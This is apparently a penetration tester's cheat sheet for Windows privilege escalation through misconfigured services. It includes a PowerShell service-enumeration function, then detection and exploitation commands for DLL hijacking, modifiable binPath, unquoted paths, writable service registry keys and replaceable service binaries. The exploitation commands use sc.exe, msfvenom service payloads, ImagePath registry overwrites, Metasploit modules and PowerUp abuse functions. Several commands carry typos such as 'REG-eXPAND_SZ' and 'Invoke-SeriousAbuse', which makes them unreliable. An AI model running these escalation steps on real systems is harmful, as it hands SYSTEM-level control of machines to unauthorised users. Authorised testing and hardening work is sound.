Services and Processes

Get non standard processes

Seatbelt.exe NonstandardProcesses

Get non standard services

Seatbelt.exe NonstandardServices

https://gist.github.com/HarmJ0y/7363509435f5700d713ee351bb4fcd8f

function Get-NonstandardService {
    [CmdletBinding()]
    Param()

    function CloneObject($Object) {
        $NewObj = New-Object PsObject
        $Object.psobject.Properties | ForEach-Object { Add-Member -MemberType NoteProperty -InputObject $NewObj -Name $_.Name -Value $_.Value }
        $NewObj
    }

    function Get-BinaryBasePath {

        [CmdletBinding()]
        Param(
            [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
            [Alias('PathName', 'FilePath')]
            [String]
            $Path
        )

        if ($Path -and ($Path -match '^\W*(?<ServicePath>[a-z]:\\.+?(\.exe|\.dll|\.sys))\W*')) {
            $Matches['ServicePath']
        }
        else {
            Write-Warning "Regex failed for the following path: $Path"
        }
    }

    function Get-PEMetaData {

        [CmdletBinding()]
        param($Path)

        try {
            $FullPath = Resolve-Path -Path $Path -ErrorAction Stop
            try {
                $Null = [Reflection.AssemblyName]::GetAssemblyName($FullPath)
                $IsDotNet = $True
            }
            catch {
                $IsDotNet = $False
            }

            $Signature = Get-AuthenticodeSignature -FilePath $FullPath -ErrorAction SilentlyContinue
            if ($Signature -and ($Signature.Status -eq 'NotSigned')) {
                $Signed = $False
                $Issuer = $Null
            }
            else {
                $Signed = $True
                $Issuer = $Signature.SignerCertificate.Issuer
            }

            $Out = New-Object PSObject
            $Out | Add-Member Noteproperty 'Path' $FullPath
            $Out | Add-Member Noteproperty 'Signed' $Signed
            $Out | Add-Member Noteproperty 'Issuer' $Issuer
            $Out | Add-Member Noteproperty 'IsDotNet' $IsDotNet
            $Out
        }
        catch {
            Write-Warning "Unable to resolve path: $Path"
        }
    }

    $MetadataCache = @{}
    Get-WmiObject -Class win32_Service -Property Name,PathName,StartMode,State,ProcessID | Where-Object { $_.PathName } | ForEach-Object {
        $BasePath = Get-BinaryBasePath -Path $_.PathName
        $ServiceName = $_.Name

        Write-Verbose "[Get-NonstandardService] Service $ServiceName : $BasePath"

        if ($MetadataCache[$BasePath]) {
            $Metadata = $MetadataCache[$BasePath]
        }
        else {
            $Metadata = Get-PEMetaData -Path $BasePath
            $MetadataCache[$BasePath] = $Metadata
        }

        $ObjectMetadata = CloneObject $Metadata
        $ObjectMetadata | Add-Member Noteproperty 'Name' $ServiceName
        $ObjectMetadata | Add-Member Noteproperty 'PathName' $_.PathName
        $ObjectMetadata | Add-Member Noteproperty 'StartMode' $_.StartMode
        $ObjectMetadata | Add-Member Noteproperty 'State' $_.State
        $ObjectMetadata | Add-Member Noteproperty 'ProcessID' $_.ProcessID
        $ObjectMetadata
    } | Where-Object {(-not $_.Signed) -or ($_.Issuer -notmatch 'Microsoft')}
}

DLL Hijacking

Detection

dumpbin.exe /dependents <exec file>
procmon
exploit/windows/local/ikeext_service
PowerUp.ps1: Find-PathDLLHijack / Find-ProcessDLLHijack / Write-HijackDll

Exploitation

BinPath

https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
Detection

sc.exe sdshow <service name>
accesschk.exe -uvwc <service name>
PowerUp.ps1: Get-ModifiableService

Exploitation

sc.exe config <service_name> binpath=<cmd>
exploit/windows/local/service_permissions
PowerUp.ps1: Invoke-SeriousAbuse -Name <service name> (-Command <cmd>)

Unquoted Path

Detection

wmic service get name,pathname
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Get-WmiObject win32_service | select Name,PathName,StartMode,StartName | where {$_.StartMode -ne "Disabled" -and $_.StartName -eq "LocalSystem"}
PowerUp.ps1: Get-ServiceUnquoted

Exploitation

exploit/windows/local/trusted_service_path
PowerUp.ps1: Write-ServiceBinary -Name <service name> -Path <hijack_path>

Registry

Detection

Get-Acl -Path HKLM:\System\CurrentControlSet\services\* | select Path,AccessToString | Format-List
Get-Acl -Path hklm:\System\CurrentControlSet\services\* | fl | Out-String -Stream | Select-String "Users Allow  FullControl" -Context 5,5
accesscheck.exe -kvusw <user> hklm\System\CurrentControlSet\services
accessenum.exe

Exploitation

1) msfvenom -p windows/exec CMD=<cmd> -d exe-service -o <bin> (No AV consideration)
2) reg.exe add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG-eXPAND_SZ /d <path_exe> /false
2) New-ItemProperty -Path HKLM:SYSTEM\CurrentControlSet\services\<service_name> -Name ImagePath -Value <value> -PropertyType ExpandString -Force

Executable File

Detection

icacls.exe <dir_or_file>
accesscheck.exe -wvu <dir_or_file>
accessenum.exe
Get-ChildItem <path_dir> -Recurse | Get-Acl | select Path,Owner,AccessToStrng,Group | Format-List
PowerUp.ps1: get-ModifiableServiceFile

Exploitation

1) msfvenom -p windows/exec CMD=<cmd> -d exe-service -o <bin> (No AV consideration)
2) Overwrite the binary file within the identified path
2) PowerUp.ps1: Invoke-ServiceAbuse -Name <service>
2) exploit/windows/local/service_permissions